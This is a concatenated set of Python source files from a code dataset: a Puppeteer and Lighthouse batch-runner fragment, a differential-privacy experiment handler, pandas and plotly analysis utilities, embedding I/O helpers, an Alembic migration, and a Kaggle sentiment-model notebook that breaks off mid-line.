--no-sandbox\" --emulated-form-factor=none --throttling-method=provided && mv google.png google_%03d.png && mv *google*.html google_%03d.html && tar -zcvf Puppeteer_results_%03d.tar.gz google*' % (\n self.PuppeteerFilePath, frameNum, frameNum, frameNum\n )\n return cmd\n\ndef untarResults( outDataDir ):\n tarFilePaths = glob.glob( outDataDir+'/Puppeteer_results_*.tar.gz' )\n for tarFilePath in tarFilePaths:\n with tarfile.open( tarFilePath, 'r' ) as tarFile:\n try:\n tarFile.extractall( path=outDataDir )\n except Exception as exc:\n logger.warning( 'could not untar %s; %s', tarFilePath, exc )\n\n\n# configure logger formatting\n#logging.basicConfig()\nlogger = logging.getLogger(__name__)\nlogFmt = '%(asctime)s %(levelname)s %(module)s %(funcName)s %(message)s'\nlogDateFmt = '%Y/%m/%d %H:%M:%S'\nformatter = logging.Formatter(fmt=logFmt, datefmt=logDateFmt )\nlogging.basicConfig(format=logFmt, datefmt=logDateFmt)\n#batchRunner.logger.setLevel(logging.DEBUG) # for more verbosity\n\ndateTimeTag = datetime.datetime.now().strftime( '%Y-%m-%d_%H%M%S' )\noutDataDir = 'data/puppeteer_' + dateTimeTag\n\ntry:\n rc = batchRunner.runBatch(\n frameProcessor = PuppeteerLighthouseFrameProcessor(),\n commonInFilePath = PuppeteerLighthouseFrameProcessor.PuppeteerFilePath,\n authToken = os.getenv( 'NCS_AUTH_TOKEN' ) or 'YourAuthTokenHere',\n encryptFiles=False,\n timeLimit = 80*60,\n instTimeLimit = 24*60,\n frameTimeLimit = 600,\n filter = '{ \"regions\": [\"usa\", \"india\"], \"dar\": \">= 99\", \"dpr\": \">=48\", \"ram\": \">=3800000000\", \"storage\": \">=2000000000\" }',\n outDataDir = outDataDir,\n startFrame = 1,\n endFrame = 5,\n nWorkers = 10,\n limitOneFramePerWorker = True,\n autoscaleMax = 2\n )\n if rc==0 and os.path.isfile( outDataDir +'/recruitLaunched.json' ):\n untarResults( outDataDir )\n rc2 = subprocess.call( [sys.executable, 'processPuppeteerOutput.py', '--dataDirPath', outDataDir],\n stdout=subprocess.DEVNULL )\n if rc2:\n logger.warning( 'processPuppeteerOutput exited with returnCode %d', rc2 )\n sys.exit( rc )\nexcept KeyboardInterrupt:\n logger.warning( 'an interuption occurred')\n","repo_name":"neocortix/ncscli","sub_path":"examples/batchMode/runBatchPuppeteerLighthouse.py","file_name":"runBatchPuppeteerLighthouse.py","file_ext":"py","file_size_in_byte":3308,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"18"}
+{"seq_id":"33973922937","text":"import os\nfrom pydoc import cli\nimport random\nimport math\nimport numpy as np\nimport csv\nimport pickle\nimport time as tm\nimport multiprocessing as mp\nimport datetime\nfrom dpsm.Client import Client, dotProduct, Fast_Client\nfrom dpsm.FDP_Server import FDP, calc_kernel_radius, FDP_Lazy,FDP_PF\nfrom dpsm.CDP_Server import CDP\n\n\n\ndef read_dict(input_path: str):\n with open(input_path, \"rb\") as f:\n dic = pickle.load(f)\n return dic\n\n\ndef get_args_dict(dataset, algorithm, k, l, gamma, seed=0, epsilon=1, n=None, m=None, select_method=None, noise=None, cutoff=None, s=None, beta=None, save=True, fast=False,e0_ratio=None):\n dic = dict()\n dic[\"dataset\"] = dataset\n dic[\"algorithm\"] = algorithm\n dic[\"k\"] = k\n dic[\"epsilon\"] = epsilon\n dic[\"gamma\"] = gamma\n dic[\"save\"] = save\n dic[\"seed\"] = seed\n dic[\"l\"] = l\n dic[\"fast\"] = fast\n dic[\"save\"] = save\n if m is not None:\n dic[\"m\"] = m\n if n is not None:\n dic[\"n\"] = n\n\n if algorithm == \"Greedy\":\n dic[\"select_method\"] = \"greedy\"\n if algorithm == \"CDP\":\n if select_method is None:\n raise ValueError(\"Error: Missing parameter: select_method.\")\n dic[\"select_method\"] = select_method\n if algorithm == \"FDP\":\n if noise is None:\n raise ValueError(\"Error: Missing parameter: noise.\")\n dic[\"noise\"] = noise\n if algorithm == \"FDP_Lazy\":\n if noise is None:\n raise ValueError(\"Error: Missing parameter: noise.\")\n if cutoff is None:\n raise ValueError(\"Error: Missing parameter: cutoff.\")\n dic[\"noise\"] = noise\n dic[\"cutoff\"] = cutoff\n if algorithm == \"FDP_PF\":\n if cutoff is None:\n raise ValueError(\"Error: Missing parameter: cutoff.\")\n if e0_ratio is None:\n raise ValueError(\"Error: Missing parameter: e0_ratio.\")\n dic[\"cutoff\"] = cutoff\n dic[\"e0_ratio\"]=e0_ratio\n return dic\n\n\nclass Handler:\n def __init__(self, MaxP=10, save_path=\"res.csv\", res_fields=None, check_fields=None) -> None:\n self.MaxP = MaxP\n self.Pcnt = 0\n self.q = mp.Queue()\n self.save_path = save_path\n self.res_fields = res_fields\n if res_fields is None:\n self.res_fields = [\"dataset\", \"algorithm\", \"utility_func\", \"l\", \"seed\", \"n\", \"m\", \"k\", \"gamma\", \"epsilon\",\n \"delta\",\"epsilon_0\", \"delta_0\", \"sigma\",\"epsilon_1\",\"epsilon_2\", \"radius\", \"select_method\", \"noise\",\"e0_ratio\",\n \"cutoff\", \"sol\", \"result\", \"time\",\"communication_cost\"]\n self.args = dict()\n self.check_fileds = check_fields\n if check_fields is None:\n self.check_fileds = [\"dataset\", \"algorithm\", \"l\", \"seed\", \"n\", \"m\", \"k\", \"gamma\", \"epsilon\",\"e0_ratio\",\n \"select_method\", \"noise\", \"cutoff\"]\n self.exist_args = set()\n\n try:\n with open(self.save_path, 'r', newline='') as csvfile:\n print('file exists')\n except:\n with open(self.save_path, 'w', newline='') as csvfile:\n writer = csv.DictWriter(csvfile, fieldnames=self.res_fields)\n writer.writeheader()\n\n with open(self.save_path) as f:\n d = csv.DictReader(f)\n cnt = 0\n for row in d:\n dd = dict()\n for key in self.check_fileds:\n if key == \"epsilon\" or key == \"gamma\":\n dd[key] = str(float(row[key]))\n else:\n dd[key] = row[key]\n self.exist_args.add(str(dd))\n\n def start(self, args):\n self.args = args.copy()\n self.start_work()\n\n def start_work(self):\n if \"epsilon\" not in self.args:\n self.args[\"epsilon\"] = 1\n if self.existed(self.args):\n print(\"ARGS EXISTED. STOP RUNNING.\")\n return\n\n self.exist_args.add(str(self.args))\n mp.Process(target=self.work, args=(self.args, self.q)).start()\n self.Pcnt += 1\n self.wait(self.MaxP)\n\n def existed(self, args):\n nargs = dict()\n # print(\"nb\")\n for key in self.check_fileds:\n nargs[key] = '' if key not in args else str(args[key])\n if key == \"epsilon\" or key == \"gamma\":\n nargs[key] = str(float(nargs[key]))\n print(str(nargs))\n return str(nargs) in self.exist_args\n\n def wait(self, minp=1):\n\n while self.Pcnt >= minp:\n a = self.q.get()\n if \"Exist\" in a:\n self.Pcnt -= 1\n continue\n if a[\"save\"]:\n with open(self.save_path, \"a\", newline='') as f:\n fileds = self.res_fields\n w = csv.DictWriter(\n f, extrasaction=\"ignore\", fieldnames=fileds)\n w.writerow(a)\n self.Pcnt -= 1\n print(self.Pcnt,\" process(es) left.\")\n\n def work(self, args, q):\n random.seed(1)\n np.random.seed(1)\n\n random.seed(args[\"seed\"])\n np.random.seed(args[\"seed\"])\n\n items = read_dict(args[\"items_path\"])\n users = read_dict(args[\"users_path\"])\n\n if \"n\" not in args:\n args[\"n\"] = len(users)\n args[\"m\"] = len(items)\n\n args[\"delta\"] = 1/(args[\"n\"]**1.5)\n\n partition = [i % args[\"l\"] for i in range(args[\"n\"])]\n selected_user = [(1 if i < args[\"n\"] else 0)\n for i in range(len(users))]\n\n # shuffle and partition data\n random.shuffle(partition)\n #\n random.shuffle(selected_user)\n cnt = 0\n num = -1\n users_data = [dict() for i in range(args[\"l\"])]\n for key in users.keys():\n num += 1\n if selected_user[num] == 0:\n continue\n users_data[partition[cnt]][key] = users[key]\n cnt += 1\n\n # create client\n clients = []\n for i in range(args[\"l\"]):\n if args[\"fast\"] is True:\n clients.append(Fast_Client(users_data[i], items, args))\n else:\n clients.append(Client(users_data[i], items, args))\n if self.args[\"algorithm\"] != \"Greedy\":\n self.calc_parameters(args)\n\n func = None\n if args[\"algorithm\"] == \"Greedy\":\n func = CDP\n elif args[\"algorithm\"] == \"FDP\":\n func = FDP\n elif args[\"algorithm\"] == \"CDP\":\n func = CDP\n elif args[\"algorithm\"] == \"FDP_Lazy\":\n func = FDP_Lazy\n elif args[\"algorithm\"] == \"FDP_PF\":\n func=FDP_PF\n print(args)\n if self.existed(args):\n args[\"Exist\"] = True\n print(\"ARGS ALREADY EXIST. STOP RUNNING.\")\n q.put(args)\n return\n sol, time,comm_cost = func(items, args, clients)\n benefits = 0\n if args[\"fast\"] is False:\n for client in clients:\n benefits += sum(client.user_benefits.values())\n else:\n for client in clients:\n benefits += client.user_benefits\n args[\"sol\"] = sol\n args[\"result\"] = benefits\n args[\"time\"] = time\n args[\"communication_cost\"]=comm_cost\n print(str(datetime.datetime.now()),\" done:\", args)\n q.put(args)\n\n def F(self, t, a, b, c):\n return (t*a)/(b-(c/(t-1)))\n\n def logjc(self, n):\n s = 0\n for i in range(n):\n s += math.log(i+1)\n return s\n\n def calc_parameters(self, args):\n\n e = args[\"epsilon\"]\n if args[\"algorithm\"] == \"CDP\":\n k = args[\"k\"]\n elif args[\"algorithm\"] == \"FDP\":\n k = args[\"k\"]*args[\"m\"]\n elif args[\"algorithm\"] == \"FDP_Lazy\":\n k = args[\"m\"]+(args[\"k\"]-1)*args[\"cutoff\"]\n elif args[\"algorithm\"] == \"FDP_PF\":\n k= args[\"k\"]*args[\"cutoff\"]\n\n d = args[\"delta\"]\n gamma = args[\"gamma\"]\n\n basic_e = e/k\n basic_d = d/k\n\n adv_d = d/2\n a = k/2\n b = math.sqrt(2*k*math.log(1/adv_d))\n c = -e\n delta = b*b-4*a*c\n\n adv_e = (-b+math.sqrt(delta))/(a+a)\n print(\"basic_e:\", basic_e, \"basic_d:\", basic_d)\n print(\"adv_e:\", adv_e, \"adv_d:\", adv_d)\n\n if basic_e > adv_e:\n args[\"epsilon_0\"] = basic_e\n args[\"delta_0\"] = basic_d\n else:\n args[\"epsilon_0\"] = adv_e\n args[\"delta_0\"] = adv_d/k\n\n args[\"delta_0\"] /= gamma\n if args[\"algorithm\"]== \"FDP_PF\":\n args[\"epsilon_1\"] = math.log(1 + (math.exp(args[\"epsilon_0\"]*args[\"e0_ratio\"]) - 1) / gamma)\n args[\"epsilon_2\"] =math.log(1 + (math.exp(args[\"epsilon_0\"]*(1-args[\"e0_ratio\"])) - 1) / gamma) \n \n args[\"epsilon_0\"] = math.log(\n 1 + (math.exp(args[\"epsilon_0\"]) - 1) / gamma)\n if args[\"algorithm\"] == \"FDP\" or args[\"algorithm\"] == \"FDP_Lazy\":\n a = k*args[\"gamma\"]*args[\"gamma\"]\n b = args[\"epsilon\"]\n c = math.log(1/args[\"delta\"])\n # print(a,b,c)\n d = 1+c/b\n sigma = math.sqrt(a/b*(2*math.sqrt(d*d-d)+2*d-1)/2)\n args[\"sigma\"] = sigma\n print(\"sigma:\", sigma)\n","repo_name":"tc2000731/code-dpsm","sub_path":"dpsm/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":9292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"42609092034","text":"import os\nimport shutil\nimport math\nimport numpy as np\nimport pandas as pd\nimport polars as pl\nfrom typing import List\nimport warnings\n\nfrom IPython.display import display, HTML\nimport plotly.graph_objects as go\nimport plotly.offline as py\nfrom plotly.subplots import make_subplots\n\nimport config\n\nHEIGHT_PLOT = 650\n\n\ndef describe_numeric(df, cols_num=None, percentiles=None, stats_nans=True):\n \"\"\"\n Describe numeric columns\n :param df: pandas data frame\n :param cols_num: numeric columns to describe, by default: identified automatically\n :param percentiles: percentiles to compute, default: [0.05, 0.25, 0.50, 0.75, 0.95]\n :return: pandas df with stats\n \"\"\"\n\n if isinstance(df, pd.Series) or isinstance(df, np.ndarray) or isinstance(df, list):\n df = pd.DataFrame({'value': df})\n\n if cols_num is None:\n cols_num = list(df.head(1).select_dtypes(include=['number']).columns)\n if percentiles is None:\n percentiles = [0.05, 0.25, 0.50, 0.75, 0.95, 0.98, 0.99]\n if len(cols_num) == 0:\n return None\n d_describe = df[cols_num].describe(percentiles=percentiles).T\n if stats_nans:\n d_describe['count_nan'] = df.isnull().sum()\n d_describe['prc_nan'] = 1 - d_describe['count'] / float(df.shape[0])\n return d_describe\n\n\ndef describe_categorical(df, cols=None):\n \"\"\"\n Describe categorical columns\n :param df: pandas data frame\n :param cols: categorical columns to describe, by default: identified automatically\n :return: pandas df with stats\n \"\"\"\n if cols is None:\n cols = list(df.head(1).select_dtypes(include=['object']).columns)\n if len(cols) == 0:\n return None\n d_describe = df[cols].astype('category').describe().T\n return d_describe\n\n\ndef describe_categorical_freq(x: pd.Series, name: str = None, max_show: int = 10, min_prc: float = 0.001):\n \"\"\"\n Describe series with categorical values (counts, frequency)\n :param x: series to describe\n :param name: name\n :param max_show: max values to show\n :param min_prc: minimum size (in %) for the category to show in stats\n :return: pandas df with stats\n \"\"\"\n if name is None:\n try:\n name = x.name\n except:\n name = 'value'\n tmp = pd.DataFrame({name: x})\n\n agg = tmp.groupby([name], dropna=False, as_index=True).agg({name: len}).rename(columns={name: 'count'})\n agg['percentage'] = agg['count'] / sum(agg['count'])\n agg.sort_values(['count'], ascending=False, inplace=True)\n agg.reset_index(drop=False, inplace=True)\n filter_out = (((agg['percentage'] < min_prc)\n & (pd.Series(range(len(agg))) > max_show))\n | (pd.Series(range(len(agg))) > max_show))\n agg = agg.loc[~filter_out, ]\n return agg\n\n\ndef display_descr_cat_freq(df, cols=None, skip_freq_cols=None, show_title=False):\n \"\"\"\n Describe categorical columns in dataframe (counts, frequency)\n :param df: data frame\n :param cols: for which columns to compute statistics, by default: identifed automatically\n :param skip_freq_cols: which columns to skip\n :return: pandas df with stats\n \"\"\"\n if cols is None:\n cols = list(df.head(1).select_dtypes(include=['object']).columns)\n if skip_freq_cols is None:\n skip_freq_cols = []\n if len(cols) == 0:\n return None\n display(describe_categorical(df, cols))\n for col in cols:\n if col not in skip_freq_cols:\n if show_title:\n display(HTML(f' {col}'))\n # else:\n # display(HTML(' '))\n display(describe_categorical_freq(df[col]))\n\n\ndef set_display_options():\n \"\"\"\n Set display options for numbers, table width, etc.\n :return: None\n \"\"\"\n pd.set_option('plotting.backend', 'plotly')\n pd.set_option('display.max_rows', 100)\n pd.set_option('display.max_columns', 50)\n pd.set_option('display.width', 2000)\n pd.set_option('display.max_colwidth', 150)\n pd.set_option('max_colwidth', 150)\n pd.set_option('display.precision', 2)\n pd.set_option('display.chop_threshold', 1e-6)\n # pd.set_option('expand_frame_repr', True)\n pd.set_option('display.float_format', lambda x: '%.3f' % x)\n warnings.simplefilter('ignore')\n pl.Config.set_tbl_rows(10)\n display(HTML(\"\"))\n\n\ndef get_last_commit_hash():\n try:\n import subprocess\n result = subprocess.check_output(['git', 'log', '-1', '--pretty=format:\"%H\"'])\n return result.decode('utf-8').replace('\"', '')[:8]\n except Exception as e:\n return None\n\n\ndef get_timestamp():\n from datetime import datetime\n return datetime.now().strftime(\"%Y%m%d%H%M%S\")\n\n\ndef get_submit_file_name(prefix='submission', tag=None):\n tag = '' if tag is None else f'-{tag}'\n commit_hash = '' if get_last_commit_hash() is None else f'-{get_last_commit_hash()}'\n timestamp = f'-{get_timestamp()}'\n return f'{prefix}{timestamp}{tag}{commit_hash}'\n\n\ndef get_best_metric(lgbm_ranker):\n try:\n metric_, best_score = list(lgbm_ranker.best_score_['valid'].items())[0]\n except (AttributeError, IndexError):\n try:\n metric_, best_score = list(lgbm_ranker.best_score_['train'].items())[0]\n except:\n metric_, best_score = 'NA', 'NA'\n\n return metric_, best_score\n\n\ndef get_best_iter(lgbm_ranker):\n best_iter = lgbm_ranker.best_iteration_ \\\n if lgbm_ranker.best_iteration_ is not None \\\n else lgbm_ranker.get_params().get('n_estimators')\n return best_iter\n\n\ndef plot_forecast_in_out(self):\n fig = go.Figure()\n t = self.forecaster.target_name\n fig.add_trace(\n go.Scatter(\n x=pd.to_datetime(np.concatenate([self.forecast_in['upgrade'], self.forecast_out['upgrade']])),\n y=np.concatenate([self.forecast_in[t], self.forecast_out[t]]),\n name=f\"actual {t}\", mode='lines', opacity=0.7,\n line=dict(color='black', width=2))\n )\n fig.add_trace(\n go.Scatter(\n x=self.forecast_in['upgrade'], y=self.forecast_in[f'pred_{t}'],\n name=f\"forecast in\", mode='lines', opacity=0.7, line=dict(color='green', width=2))\n )\n fig.add_trace(\n go.Scatter(\n x=self.forecast_out['upgrade'], y=self.forecast_out[f'pred_{t}'],\n name=f\"forecast out\", mode='lines', opacity=0.7, line=dict(color='red', width=2))\n )\n fig.update_layout(title=self.forecaster_class.__name__, autosize=True, height=750,\n legend=dict(x=0, y=1, bgcolor='rgba(0,0,0,0)'))\n py.iplot(fig)\n # py.plot(fig)\n\n\ndef plot_multiple_cfips(df, measure='microbusiness_density', title=None, max_n=30, height=config.HEIGHT_PLOT_MEDIUM):\n fig = go.Figure()\n\n if title is None:\n title = ', '.join(sorted(list(df['state'].unique())))\n\n for cfips in sorted(list(df['cfips'].unique()))[:max_n]:\n df_cfips = df.filter(pl.col('cfips') == cfips)\n fig.add_trace(\n go.Scatter(\n x=df_cfips['first_day_of_month'],\n y=df_cfips[measure],\n name=cfips,\n mode='lines',\n opacity=0.7\n )\n )\n fig.update_layout(\n title=f'{title} - {measure}',\n autosize=True,\n height=height,\n legend=dict(x=1, y=0, bgcolor='rgba(0,0,0,0)'),\n yaxis={'title': measure},\n margin=config.PLOT_MARGINS_MEDIUM,\n )\n py.iplot(fig)\n\n\ndef plot_multiple_cfips_microbiz_dens(df):\n return plot_multiple_cfips(df, measure='microbusiness_density')\n\n\ndef plot_multiple_cfips_active(df):\n return plot_multiple_cfips(df, measure='active')\n\n\ndef plot_multiple_cfips_population(df):\n return plot_multiple_cfips(df, measure='population')\n\n\ndef plot_aggregated_cfips(df, title=None, measure='microbusiness_density', by='first_day_of_month',\n lo_q=0.25, mid='mean', hi_q=0.75, include_hi_lo=True, height=config.HEIGHT_PLOT_LOW):\n\n if title is None:\n title = ', '.join(sorted(list(df['state'].unique())))\n\n df_agg = df \\\n .groupby(by) \\\n .agg([pl.quantile(measure, hi_q).alias(f'q{hi_q * 100}'),\n pl.median(measure).alias('median'),\n pl.mean(measure).alias('mean'),\n pl.sum(measure).alias('sum'),\n pl.quantile(measure, lo_q).alias(f'q{lo_q * 100}'),\n ]) \\\n .sort(by)\n\n fig = go.Figure()\n fig.add_trace(\n go.Scatter(\n name=mid,\n x=df_agg['first_day_of_month'],\n y=df_agg[mid],\n mode='lines',\n line=dict(color='rgb(31, 119, 180)', width=3),\n showlegend=False\n )\n )\n\n if include_hi_lo:\n fig.add_trace(\n go.Scatter(\n name=f'q{hi_q * 100}',\n x=df_agg['first_day_of_month'],\n y=df_agg[f'q{hi_q * 100}'],\n mode='lines',\n marker=dict(color=\"#444\"),\n line=dict(width=0),\n showlegend=False\n )\n )\n\n fig.add_trace(\n go.Scatter(\n name=f'q{lo_q * 100}',\n x=df_agg['first_day_of_month'],\n y=df_agg[f'q{lo_q * 100}'],\n marker=dict(color=\"#444\"),\n line=dict(width=0),\n mode='lines',\n fillcolor='rgba(68, 68, 68, 0.3)',\n fill='tonexty',\n showlegend=False\n )\n )\n\n fig.update_layout(\n title=f'{title} - {measure}',\n autosize=True,\n height=height,\n yaxis_title=measure,\n hovermode=\"x\",\n margin=config.PLOT_MARGINS_SMALL,\n )\n py.iplot(fig)\n\n\ndef plot_aggregated_cfips_microbiz_dens(df):\n return plot_aggregated_cfips(df, measure='microbusiness_density')\n\n\ndef plot_aggregated_cfips_active(df):\n return plot_aggregated_cfips(df, measure='active', mid='sum', include_hi_lo=False, height=config.HEIGHT_PLOT_MEDIUM)\n\n\ndef plot_aggregated_cfips_population(df):\n return plot_aggregated_cfips(df, measure='population', mid='sum', include_hi_lo=False)\n\n\ndef make_plots_cfips(df_train, state):\n if config.MAKE_PLOTS:\n return\n\n # plot_multiple_cfips_microbiz_dens(df_train.filter(pl.col('state') == state))\n plot_multiple_cfips_active(df_train.filter(pl.col('state') == state))\n # plot_multiple_cfips_population(df_train.filter(pl.col('state') == state))\n\n # plot_aggregated_cfips_microbiz_dens(df_train.filter(pl.col('state') == state))\n plot_aggregated_cfips_active(df_train.filter(pl.col('state') == state))\n # plot_aggregated_cfips_population(df_train.filter(pl.col('state') == state))\n\n\ndef get_stats(values, by, sub_na_with=None):\n if sub_na_with is not None:\n by = np.array(by)\n by[~(by == by)] = sub_na_with\n d = pd.DataFrame({'values': np.array(values).astype('float'), 'by': np.array(by)})\n d_agg = d.groupby('by', as_index=False).agg(\n count=('values', len),\n min=('values', np.nanmin),\n p10=('values', lambda x: np.nanpercentile(x, 10)),\n p25=('values', lambda x: np.nanpercentile(x, 25)),\n p50=('values', lambda x: np.nanpercentile(x, 50)),\n mean=('values', np.nanmean),\n sd=('values', np.nanstd),\n p75=('values', lambda x: np.nanpercentile(x, 75)),\n p90=('values', lambda x: np.nanpercentile(x, 90)),\n max=('values', np.nanmax)\n )\n return d_agg\n\n\ndef get_box_chart(x, y, name=None, return_stats=False, order_by_count=False, min_prc_count=None, sub_na_with=None, **kwargs):\n d_agg = get_stats(y, x, sub_na_with)\n\n if order_by_count:\n d_agg = d_agg.sort_values(['count'], ascending=False)\n\n if min_prc_count is not None:\n d_agg = d_agg.loc[d_agg['count'] > (min_prc_count*sum(d_agg['count']))]\n\n box = go.Box(\n name=name,\n x=d_agg['by'],\n lowerfence=d_agg['p10'],\n q1=d_agg['p25'],\n median=d_agg['p50'],\n mean=d_agg['mean'],\n q3=d_agg['p75'],\n upperfence=d_agg['p90'],\n # boxpoints=False,\n # boxmean=True,\n **kwargs\n )\n if return_stats:\n return box, d_agg\n else:\n return box\n\n\ndef plot_box_plot(target_values, by_values, yaxis_title='value', xaxis_title='by', x_as_category=True,\n order_by_count=False, min_prc_count=None, sub_na_with=None):\n fig = go.Figure()\n trace_ = get_box_chart(x=by_values, y=target_values, name=xaxis_title,\n order_by_count=order_by_count, min_prc_count=min_prc_count, sub_na_with=sub_na_with)\n fig.add_trace(trace_)\n fig.update_layout(\n title='',\n autosize=True, legend=dict(x=0, y=1, bgcolor='rgba(0,0,0,0)'), height=config.HEIGHT_PLOT_MEDIUM, # width=1200,\n margin=dict(l=25, r=25, t=25, b=25), # yaxis_range=rng_y_boxplot, # boxmode='group',\n xaxis_title=xaxis_title,\n yaxis_title=yaxis_title,\n )\n if x_as_category:\n fig.update_xaxes(type='category')\n\n return fig\n","repo_name":"nicolaivicol/gd-mbiz-dens-fcst","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":13068,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"33578568260","text":"from tqdm import tqdm\nimport numpy as np\n\n\ndef read_embeddings(fname, encoding='utf-8'):\n with open(fname, 'r', encoding=encoding) as src:\n header = src.readline()\n wordcount, vectorsize = map(int, header.split())\n word2index = {}\n vectors = np.zeros([wordcount, vectorsize])\n for i in tqdm(range(wordcount)):\n row = src.readline().split()\n if len(row) != vectorsize + 1:\n continue\n word = row[0]\n vector = np.array(list(map(float, row[1:])))\n word2index[word] = i\n vectors[i, :] = vector\n return word2index, vectors\n\n\ndef save_embeddings(fname, word2index, vectors, encoding='utf-8'):\n with open(fname, 'w', encoding=encoding) as target:\n target.write('{0} {1}\\n'.format(len(word2index), vectors.shape[1]))\n for word, index in tqdm(word2index.items(), total=len(word2index)):\n vector = vectors[index]\n vector_str = ' '.join(map(str, vector))\n target.write('{0} {1}\\n'.format(word, vector_str))\n\n\ndef cutten_embeddings(wordset, word2index, vectors):\n word2index_cut = {}\n for word in tqdm(sorted(wordset)):\n if word not in word2index:\n continue\n word2index_cut[word] = len(word2index_cut)\n vectors_cut = np.zeros([len(word2index_cut) + 1, vectors.shape[1]])\n for word, index in tqdm(word2index_cut.items()):\n vectors_cut[index, :] = vectors[word2index[word]]\n return word2index_cut, vectors_cut\n","repo_name":"QtRoS/nodl_toxic","sub_path":"toxic-neural/embeddings.py","file_name":"embeddings.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"11926911587","text":"\"\"\"posts tag\n\nRevision ID: c8d93aa46fe8\nRevises: 7040ce8985c8\nCreate Date: 2020-03-18 19:11:48.214433\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'c8d93aa46fe8'\ndown_revision = '7040ce8985c8'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_index(op.f('ix_softwares_dateRelease'), 'softwares', ['dateRelease'], unique=False)\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_index(op.f('ix_softwares_dateRelease'), table_name='softwares')\n # ### end Alembic commands ###\n","repo_name":"pbaesse/dados-livres","sub_path":"migrations/versions/c8d93aa46fe8_posts_tag.py","file_name":"c8d93aa46fe8_posts_tag.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"18"}
+{"seq_id":"71427538920","text":"# This Python 3 environment comes with many helpful analytics libraries installed\n# It is defined by the kaggle/python docker image: https://github.com/kaggle/docker-python\n# For example, here's several helpful packages to load in \n\nimport numpy as np # linear algebra\nimport pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)\n\n# Input data files are available in the \"../input/\" directory.\n# For example, running this (by clicking run or pressing Shift+Enter) will list the files in the input directory\n\nimport os\nprint(os.listdir(\"../input\"))\n\n# Any results you write to the current directory are saved as output.\ntrain = pd.read_csv('../input/movie-review-sentiment-analysis-kernels-only/train.tsv', sep=\"\\t\")\ntest = pd.read_csv('../input/movie-review-sentiment-analysis-kernels-only/test.tsv', sep=\"\\t\")\nsub = pd.read_csv('../input/movie-review-sentiment-analysis-kernels-only/sampleSubmission.csv', sep=\",\")\nfull_text = list(train['Phrase'].values) + list(test['Phrase'].values)\nimport pandas as pd\nimport numpy as np\nfrom sklearn.preprocessing import OneHotEncoder\n\nimport keras \nfrom keras.preprocessing.text import Tokenizer\nfrom keras.preprocessing.sequence import pad_sequences\nfrom keras.layers import Dense, Input, LSTM, Embedding, Dropout, Activation, Conv1D, GRU\nfrom keras.layers import Bidirectional, GlobalMaxPool1D, MaxPooling1D, Add, Flatten\nfrom keras.layers import GlobalAveragePooling1D, GlobalMaxPooling1D, concatenate, SpatialDropout1D, BatchNormalization\nfrom keras.models import Model, load_model\nfrom keras import initializers, regularizers, constraints, optimizers, layers, callbacks\nfrom keras import backend as K\nfrom keras.engine import InputSpec, Layer\nfrom keras.optimizers import Adam, RMSprop\n\nfrom keras.callbacks import Callback, EarlyStopping, ModelCheckpoint, LearningRateScheduler\ntokenizer = Tokenizer(lower = True, filters = '')\ntokenizer.fit_on_texts(full_text)\ntrain_tokenized = tokenizer.texts_to_sequences(train['Phrase'])\ntest_tokenized = tokenizer.texts_to_sequences(test['Phrase'])\nmax_len = 50\nX_train = pad_sequences(train_tokenized, maxlen = max_len)\nX_test = pad_sequences(test_tokenized, maxlen = max_len)\nX_train.shape\nX_test.shape\nembedding_path = \"../input/fasttext-crawl-300d-2m/crawl-300d-2M.vec\"\nembed_size = 300\nmax_features = 20000\ndef get_coefs(word,*arr):\n return word, np.asarray(arr, dtype='float32')\ndef get_embed_mat(embedding_path):\n \n embedding_index = dict(get_coefs(*o.strip().split(\" \")) for o in open(embedding_path))\n\n word_index = tokenizer.word_index\n nb_words = min(max_features, len(word_index))\n embedding_matrix = np.zeros((nb_words + 1, embed_size))\n for word, i in word_index.items():\n if i >= max_features:\n continue\n embedding_vector = embedding_index.get(word)\n if embedding_vector is not None:\n embedding_matrix[i] = embedding_vector\n \n return embedding_matrix\ny = train['Sentiment']\n\none_hot_encoder = OneHotEncoder(sparse=False)\ny_one_hot = one_hot_encoder.fit_transform(y.values.reshape(-1, 1))\nfile_path = \"model.hdf5\"\ncheck_point = ModelCheckpoint(file_path, monitor = \"val_loss\", verbose = 1,\n save_best_only = True, mode = \"min\")\nearly_stop = EarlyStopping(monitor = \"val_loss\", mode = \"min\", patience = 10)\nfrom keras.preprocessing.text import Tokenizer\nfrom keras.preprocessing.sequence import pad_sequences\nfrom keras.layers import Dense, Input, LSTM, Embedding, Dropout, Activation, Conv1D, GRU, CuDNNGRU, CuDNNLSTM, BatchNormalization\nfrom keras.layers import Bidirectional, GlobalMaxPool1D, MaxPooling1D, Add, Flatten\nfrom keras.layers import GlobalAveragePooling1D, GlobalMaxPooling1D, concatenate, SpatialDropout1D\nfrom keras.models import Model, load_model\nfrom keras import initializers, regularizers, constraints, optimizers, layers, callbacks\nfrom keras import backend as K\nfrom keras.engine import InputSpec, Layer\nfrom keras.optimizers import Adam\n\nfrom keras.callbacks import ModelCheckpoint, TensorBoard, Callback, EarlyStopping\ndef build_model(lr = 0.0, lr_d = 0.0, units = 0, dr = 0.0):\n inp = Input(shape = (max_len,))\n x = Embedding(19479, embed_size, weights = [embedding_matrix], trainable = False)(inp)\n x1 = SpatialDropout1D(dr)(x)\n\n x_gru = Bidirectional(CuDNNGRU(units, return_sequences = True))(x1)\n x1 = Conv1D(32, kernel_size=3, padding='valid', kernel_initializer='he_uniform')(x_gru)\n avg_pool1_gru = GlobalAveragePooling1D()(x1)\n max_pool1_gru = GlobalMaxPooling1D()(x1)\n \n x3 = Conv1D(32, kernel_size=2, padding='valid', 